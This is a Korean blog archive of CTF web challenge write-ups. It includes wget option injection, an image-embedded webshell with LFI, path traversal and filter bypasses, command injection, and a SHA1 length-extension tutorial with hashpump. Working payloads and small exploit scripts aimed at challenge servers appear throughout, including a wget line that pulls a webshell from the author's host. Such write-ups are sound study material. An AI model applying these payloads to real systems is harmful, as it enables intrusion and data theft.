'2019/09'에 해당되는 글 18건

Downloader v1

들어가보면 url 입력하는 기능하나가 있다. default로 박힌 값을 입력해보면 아래와 같은 에러가 뜨는걸 볼 수 있다.

cd uploads/5d7623f3880b62ddb90e13f31a558

$ wget http://example.com/image.jpg 2>&1

--2019-09-09 10:05:39--  http://example.com/image.jpg

Resolving example.com (example.com)... 93.184.216.34, 2606:2800:220:1:248:1893:25c8:1946

Connecting to example.com (example.com)|93.184.216.34|:80... connected.

HTTP request sent, awaiting response... 404 Not Found

2019-09-09 10:05:39 ERROR 404: Not Found.

$ bash -c 'rm uploads/5d7623f3880b62ddb90e13f31a558/*.{php,pht,phtml,php4,php5,php6,php7}'

인풋이 wget의 url 인자로 들어가는데 \n , ; , | , & , ` , $ 등 죄다 막혀있다. 그리고 추가로 php 실행 확장자면 삭제하길래 웹쉘 올리면 되는건가 싶어서 http://my_ip/webshell.txt -O /var/www/html/uploads/이전의생성된디렉토리/webshell.php 이런식으로해서 php 올리고 실행해보니까 실행이 안됬다. 뭐지 하다가 커멘드 인젝션은 안되도 wget 옵션이랑 인자는 줄 수 있으니까 쓸만한거 있나보다가 --input-file 요거 사용해서 flag.php 읽었을 때 도메인에러 나게해서 플래그를 구했다. 

payload = http://example.com/image.jpg --input-file='../../flag.php'

imgur

문제에 들어가보면 일단 lfi가 터진다. 그래서 웹쉘을 아무렇게나 올리고 땡겨주면 된다.

뭐 땡길까 보다가 일단 업로드 기능이 있었다.

프로필 사진을 변경할 때 아래와 같이 i.imgur.com이란 도메인에 존재하는 파일 내용을 가져와서 업로드를 한다.

https://imgur.dctfq19.def.camp/index.php?page=profile&setpicture=https://i.imgur.com/W4a51sL.jpg 

이 때 setpicture 파라미터 값에 대해서 도메인이랑 확장자 검증을 하는데 이게 우회가 안된다.

그래서 해당 사이트에 직접 웹쉘이 박힌 이미지 파일을 올려야 되는데 그냥 대충 이미지 파일에 웹쉘 넣어서 올리면 안되길래 

https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

요고 참고해서 웹쉘 박아서 올렸다.

그다음엔 그냥 i.imgur.com에 올린 웹쉘가지고 프로필 사진 업로드한담에 lif로 땡겨주면 쉘 딸수있고 플래그 찾아주면 된다.

api

문제 서버가 닫혔는데 대충 기억해보면 ///etc/passwd였나 이런식으로 요청해주면 file download가 된다. 

이걸로 소스 쭉쭉 긁어오면

if(urlParts[0]) {

    switch(urlParts[0]) {

        case 'getconfig':

            functions.getConfigFromVault(request, response);

        break;

        case 'proxy':

            functions.getProxy(request, response);

        break;

        default:

            new doRequest(request, response);

            break;

    }

} else {

    new doRequest(request, response);

}

getProxy: function(request, response) {

   this.getRequestFields(request, global.config, function(fields) {

       if(!fields || !fields.url) {

           response.end('Invalid fields.');

       }

       if(fields.url.indexOf('get_secret') !== -1 || fields.url.indexOf('/') !== -1) {

           response.end("Invalid request");

           return;

       }

       fields.url = Buffer.from(fields.url.toLowerCase(), "latin1").toString();

       var options = {

         host: global.config.PROXY,

         port: 2222,

         path: fields.url

       };

       http.get(options, function(rresponse) {

         var body = '';

         rresponse.on('data', function(chunk) {

           body += chunk;

         });

         rresponse.on('end', function() {

           response.end(body);

         });

       }).on('error', function(e) {

           response.end("Got error: " + e.message);

       }); 

   });

},

요런 코드가 있다.

getproxy?=/get_secret/key 요런식으로 요청해주면 되는데 /랑 get_sercert를 필터한다. get_sercret같은 경우 검증한 담에 lowercase해줘서 get_secreT 이런식으로 써줌 되고 /같은 경우 필터 후에 Buffer.from(fields.url.toLowerCase(), "latin1").toString(); 요 작업을 거치기 땜에 %c4%af 요 값으로 bypass해주면 된다.

그리고 key같은 경우 ///proc/self/environ 파일 내용 확인해보면 존재한다.

payload = %c4%afget_secreT%c4%aff0af17449a83681de22db7ce16672f16f37131bec0022371d4ace5d1854301e0

online-album

이건 풀려고보니까 대회가 끝나서 문제를 못봤었는데, 대회 종료 후에도 서버가 계속 열려있길래 한번 풀어봤다.

문제에 들어가보면 다운로드 기능이 있는데 경로를 아래와 같은 형태로 url double encoding해주면 파일 다운로드가 가능하다.

/download/%25%32%65%25%32%65%25%32%66.env

이걸로 .env읽어서 app_key따고 cve나온걸로 rce해봤는데 패치 버전인지 잘 안됬다.

그래서 좀 헤매다 기능중에 주석에] 파일 목록들을 base64인코딩해서 뿌려주는 기능이 있었다.

/album/cars

 <!-- Debug: 

MS5qcGVn.5d7896147325e

Mi5qcGVn.5d78961473265

My5qcGVn.5d78961473268

NC5qcGVn.5d7896147326b

NS5qcGVn.5d7896147326e

 -->

다운로드 할때처럼 url double 인코딩해주면 다른 경로 디렉토리 리스팅이 가능해서 이걸로 플래그 파일을 찾아봤는데 도저히 안보였다.

그래서 일단 소스를 쭉쭉 다운로드 받다보니 auto_logout 기능 수행 시 command injection이 가능했다.

    public function auto_logout(Request $request)

    {

        Auth::logout();

        //delete file after logout

        $cmd = 'rm "'.storage_path().'/framework/sessions/'.escapeshellarg($request->logut_token).'"';

        shell_exec($cmd);

    }

1. 개요

Stypr challenge의 eagle jump 풀다가 배웠던 기법인데, 웹쪽보다는 크립토인데 이게 웹이랑 연계되서 사용되는 경우도 은근 있어서 이참에 한번 정리해봤다. 해당 기법은 대충 어떻게 동작하는지에 대한 원리정도랑 해당 원리에 대한 이해를 기반으로 페이로드 생성해주는 HashPump 사용해서 실제 공격까지는 가능한 선으로만 이해하고 있고 실제로 로우레벨에서 페딩이 포함된 실제 페이로드 및 해당 공격을 통해 생성한 해쉬값 만들기를 직접 할 정도로 완벽하게 이해는 못한 상태이다. 그 이유는 암호학에 대한 근본적인 이해가 많이 없어서 라고 느꼈고 이걸 계기로 암호학도 조금씩 공부해둬야 겠다는 생각이 들었다.

2. 동작원리

동작원리와 같은 경우 그냥 내가 이해한 대로 그냥 부담없이 적어내려가는 형식으로 작성하겠다.

먼저 해당 기법과 같은 경우 공격 이름 그대로 길이를 확장해서 공격한다는 뜻이다. 이게 뭔 소리냐면 어떤 해쉬 값을 생성할 때 원본 텍스트에 패딩이라는 값을 추가하여 뭔짓을 하다보니 원본 텍스트의 길이가 늘어냐면서 이런 이름이 붙었다고 볼 수 있다. 해당 공격은 또 다른 말로 sha1,md5 padding attack 정도로도 불리곤 한다.

자 그럼 해당 공격이 뭔진 정확히 모르겠지만 대충 어떠한 상황에서 필요한지 알기 위해 아래 코드를 보자.

source.php

<?php
error_reporting(E_ALL);
ini_set("display_errors",0);

include("config.php");
if (isset($_GET['id'])){
    if (sha1(SECRET+$_GET['id'])===$_GET['hash']){
        if (strpos($_GET['id'],"admin")!==false){
            echo "Hi admin!! You Success";
        }
        else{
            echo "You not admin!! Bye Bye.";
        }
    }
    else{
        echo "You Bad Hash!!";
    }   
}
else{
    echo (string)sha1(SECRET+"guest");
}

자 코드를 보면 뭘해야 될지 느낄 수 있을 것이다. 딱봐도 id값에 admin을 주고 id가 admin일 때 sha1값을 구해서 보내주면 되는데, 문제는 sha1 생성 시 salt값이 추가되고 있고 우리는 salt값을 모른다는 거다. 문제에선 id가 guest일때의 salt가 포함된 sha1만 만들어주기 떄문에 우리는 이 로직을 우회하려면 일반적으로 salt+guest를 통해 생성된 해쉬를 대상으로 salt를 크랙하는 수밖에 없다.

근데 이러한 상황에서 우리는 바로 지금 우리가 다루는 length extension attack을 통해 해당 로직을 우회할 수 있다.

엄청나지 않은가?

아직 뭔진 모르지만 이러한 공격이 가능해진다는것만으로도 해당 기법을 이해하는데 큰 의미가 생길 것이다. 자 그럼 이제 본격적으로 해당 공격의 원리 및 익스 방법에 대해 알아보자.

해당 공격을 이해하기 위해선 우선 md5,sha1,sha2 류가 인풋을 받아서 해쉬처리를 할 때 어떠한 방식으로 동작하는지에 대해 알 필요가 있다.

이는 아래 사진을 보고 이해해보도록 하자.

해당 방식은 md5,sha1,sha2류가 해쉬를 만들 때 사용하는 방식으로 그림을 보면 알 수 있듯이 인풋의 첫번째 블록(M1)과 IV(H0)를 통해 압축과정을 거쳐 첫번째 해쉬 값을 만든다. 그 다음 해당 해쉬를  다시 IV삼아 두번째 인풋블록과 압축과정을 거치고, 이러한 과정을 인풋의 전체 블록을 대상으로 진행해 최종 해쉬값을 만든다.

그럼 이제 우리가 생각할건 인풋을 블록별로 나눌 때 당연히 인풋이 블록 배수로 딱 나누어 떨어지지 않을거니까 패딩이 붙을거라는 걸 생각해야 한다.

예를 들면 이런 형태다.

input : guest

m1 = salt + guest + padding

result hash = 40bd001563085fc35165329ea1ff5c5ecbdbbeef (예시로 임의로 쓴 해쉬)

위 상황에서 만약 우리가 input을 아래와 같이 준다면 어떻게 될까?

input : guest+padding ( padding은 정확히 block size 만큼)

m1 = salt + guest + padding

result hash = 40bd001563085fc35165329ea1ff5c5ecbdbbeef

럭키..

이를 통해 우리는 뭘 할 수 있을까?

input : guest+padding + admin

m1 = salt + guest + padding+admin

result hash = 7110eda4d09e062aa5e4a390b0a572ac0d2c0220

이게 뭘까? 잘 한번 생각해보자. 인풋이 salt랑 합쳐져서 salt + guest + padding+admin 가 됬을 때 블록단위로 나누면 

1블록 : salt + guest + padding

2블록 : admin+padding

이렇게 될꺼다.

여기서 1블록 결과는 우리가 알고 있는 40bd001563085fc35165329ea1ff5c5ecbdbbeef 요 값일 거고 최종해쉬를 생성하기위해 2번째 블록 admin+padding은 1블록 결과 40bd001563085fc35165329ea1ff5c5ecbdbbeef를 iv로해서 압축과정을 거쳐 최종 해쉬 7110eda4d09e062aa5e4a390b0a572ac0d2c0220를 만드는 거다.

그럼 결국 우리는 salt를 모르지만 기존 값(guest)에 추가적으로 내가 원하는 값(admin)을 삽입했을 때의 hash를 알 수 있다. 

그럼 이제 우리가 해야할 일은 guest+padding+admin을 줄 때 이 padding값을 어떻게 줘야하는지다.

md5,sha1,sha2류에서 쓰는 padding은 아래와 같은 형태로 구성된다.

salt+guest+1 000 0000 .... 0000 0000 + 해당 블록의 패딩을 제외한 값(salt+guest)의 비트 크기(만약 3글자 즉 3byte면 24 비트고 \x18로 표현됨)

위의 패딩부분에서 바로 나오는 1,0부분은 비트를 표현한거임. 구조가 인풋 다음 패딩 맨처음의 1비트는 1로 표현되서 1000 0000 = \x80으로 고정. 그담은 남은 크기만큼 0비트로 쭉 채워지니 \x00쭉가다가 마지막에 salt+input의 비트 크기로 마무리.

ex)

salt = "secret"

input = "guest"

위 놈들로 패딩을 채운다고 생각하면 아래처럼 될 것이다.

guest+"\x80"+"\00"*(64-len(input+salt)+2)+"\x58"

guest\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\58

굿... 간단하게 키좀긴걸로 하나더.

salt = 55글자 키

input = "guest"

guest+"\x80"+"\00"*(64-len(input+salt)+3)+"\x01\xe0"

guest\x80\x00\x01\xe0 가 나와야 할것 같은데

guest\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe0

요게 나와버림. 아마 인풋 마지막 부분이 패딩인지 원본 값인지 몰라서 oracle padding처럼 어떻게 돌아가는거 같은데 이부분은 따로 관련 내용을 못봐서 몰게따. 쨋든 대충 이렇게 돌아가는거 아니까 걍 hashpump 쓰면 될 듯.

자 그럼 최초 문제로 돌아와서 

source.php

<?php
error_reporting(E_ALL);
ini_set("display_errors",0);

include("config.php");
if (isset($_GET['id'])){
    if (sha1(SECRET+$_GET['id'])===$_GET['hash']){
        if (strpos($_GET['id'],"admin")!==false){
            echo "Hi admin!! You Success";
        }
        else{
            echo "You not admin!! Bye Bye.";
        }
    }
    else{
        echo "You Bad Hash!!";
    }   
}
else{
    echo (string)sha1(SECRET+"guest");
}

이거 우회하는 코드 만들어보자.

여기서 중요한게 우리가 패딩을 만들려면 원본 키 길이를 알아야 한다. 키 길이 알아내는 방법은 어쩔수 없다. 가정하고 브포때리는거다.

대충 키 길이 1~64까지 가정해서 페이로드 만들고, 모든 페이로드를 날렸을때 정상적으로 인증 통과하는 값이 있으면 그게 키 길이고, 해당 페이로드를 사용해주면 된다.

여기서는 키 값이 8이라고 가정하고 페이로드를 만들어보자.

hashpump 사용해도되고 그냥 만들어도 되는데 그냥 만들어보자.

guest+"\x80"+"\x00"*(64-len(8+5)-2)+"\x68"+"admin"

hashpump 버전

hashpump -s '87c85771298bb84ae2703eb34eeeeac91f11f502' --data 'guest' -a 'admin' -k 8

2d3c477a9c38ba0dc9378b106975ad52139663b7

guest\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68admin

굿잡.

대응방법 및 한계

만약 salt가 input 앞이 아닌 뒤쪽에 들어간다면?

input+salt+padding

이게 원래 구조일텐데

input+padding+salt ???? 내가 입력한 패딩을 포함한 인풋이 원래 블록에 들어가는 패딩 구조와 일치 할 수가 없음. 

즉 

salt + input + padding  요 구조일 때만 내가 인풋이랑 뒤에 padding을 넣어도 원래 패딩처리했을 때 값과 같으므로 이 공격할려면 해당 구조를 띄워야함.

또한 만약 salt+input+padding 구조여도 해쉬를 더블 해쉬 처리하면 공격이 불가능함. 이러한 형태를 띈 함수가 대표적으로 HMAC.

왜 이게 안되는지 생각해보면. 우리가 알고 있는 (hmac으로 생성됬다고 가정) 해쉬 값은 내가 넣은 인풋을 해쉬처리한 후 다시 해쉬처리해서 생성된 해쉬 값이다. 즉 내가 알고있는 결과 해쉬 값을 단순 sha1의 결과물이라고 생각하면 이놈의 원본 값은 내 인풋,솔트,패딩을 더한값이 아닌 이 놈들을 토대로 생성된 해쉬 값이 원본이란 거다. 그러므로 뭔가 막상 안되는거 구조적으로 엮어서 나열하면 헷갈리는데 딱 느낌올거다 구조적으로 안되는 상황인게. 쨋든 이놈은 딱 salt+input 상황에서 md5,sha1,sha2류의 해쉬함수를 더블해쉬아니고 한번만 해쉬처리할때 사용 가능하다.

인풋을 통해 생성된 값이랑 임의의 값을 비교한다. 이 때 두 값이 같아야 한다. 인풋을 통해 생성된 값은 인풋*0x1000을 통해 생성된다. 비교대상 값같은 경우 timestamp값을 통해 생성된 값이다.

이 때 timestamp의 소수점 하위 4번째까지 계산되는데 정수부분은 인풋 * 0x1000로 계산하면 결과 값이 딱 떨어졌는데 소수점 부분은 *0x1000했을때 결과 값에 오차가 있었다. 그래서 대충 최대한 오차범위 줄여서 반복요청해주니 플래그가 나왔다.

exploit.py

import time
import requests

def exploit():
    url = "http://chall.tasteless.eu/level12/lucky.php"
    param = {"emit":time.time()-5.071}
    result = requests.get(url,params=param).text
    if "flag is" in result:
        print result
        exit()
    return result.replace("<br />VAR b is ",",").replace("<br />","").replace("VAR a is ","").split(",")

for i in range(0,1000):
    result = exploit()
    tmp =  int("0x"+result[0],16)-int("0x"+result[1],16)
    print tmp
    if tmp==0:
        print "find count = " + str(i)
        break

source.php

<html>
<head>
<title>In My Dreams</title>
</head>
<body>
<p>Here is the <a href='index2.html'>source</a>!</p>
</body>
</html>
<?php
//hi all! you may ask what to do here? its simple, just have a nice walk through these lines, then just call w_() 
//and its done 
$_k = @$_GET['magic']; //put the magic byte here :)
$_u=create_function('$_a_','foreach($_a_ as $_=>$__){$a[$_]=$__;}return @array_splice($a,1);'); 
$_u=@call_user_func($_u,@$_GET['argv']);function w_(){print'Good job! flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';}$_f=chr(112).chr(114).__CLASS__."\x65"."\x67"."_"; 
$_function=create_function('$___,$_,$__','return(strcmp((($_^$__)|$___),123)==0)?1:0;'); 
((int)$_function((int)$_u[0],(int)$_u[1],(int)$_u[2])>0)?0:printf("%s",die()); 
$__=cosh;$___=$__[asinh(_)];$_t="\x31";$___.=$__[$_t+$_t+$_t];$___.=$__[$_t];$___++;$___++;$___++; 
$_f.=substr(str_repeat("\x72",11),-3,1)."e";$_f_=metaphone(crc32(__DIR__).preg_replace("%^=(\?):*?[\sa-z*]*{\$}*?.[^\D]{1,}(\w|\s)$%sUi","${2}1,$1",crc32(__FILE__))); 
@$_a.=__METHOD__."\x25".$___(@0+"@${$_t}"+~$_k+1*(5*20))."\x0";$_f.="pl";
$_f.="ac"."\x65";@$_f("%.".$_a."%ixs","(string)$_u[3]()",' ');

인풋으로 magic이랑 argv 두개를 받는다. 

일단 먼저 argv[1],argv[2],argv[3] 값으로 return(strcmp((($_^$__)|$___),123)==0)?1:0; 요부분 리턴 1나오게 값 세팅해 주면 된다.

그다음 argv[4]는 @$_f("%.".$_a."%ixs","(string)$_u[3]()",' '); 요기 두번째 인자 영역에 들어가는데 $_f은 preg_replace 문자열이기때문에 argv[4]에 w_를 세팅해주고 패턴영역에 e modifier를 insert해주면 php code 실행을 통해 w_함수를 사용할 수 있다.

그럼 이제 $_a 요 값이 어떤식으로 세팅되는지 보면 되는데 __METHOD__."\x25".$___(@0+"@${$_t}"+~$_k+1*(5*20))."\x0";$_f.="pl";

요 코드를 통해 "%".연산결과."\x0" 이런식으로 세팅되는걸 볼 수 있다. 연산결과는 magic 파라미터 값을 통해 특정 연산들을 거쳐서 세팅되는데 이 값이 만약 e가되면 %e\x00꼴로되서 php code가 실행될 거라 생각했다.

주석 중에 //put the magic byte here :) 요런게 있어서 그냥 magic값에 00~ff까지 브포 돌리니까 플래그를 뿌려주는 byte가 존재했다.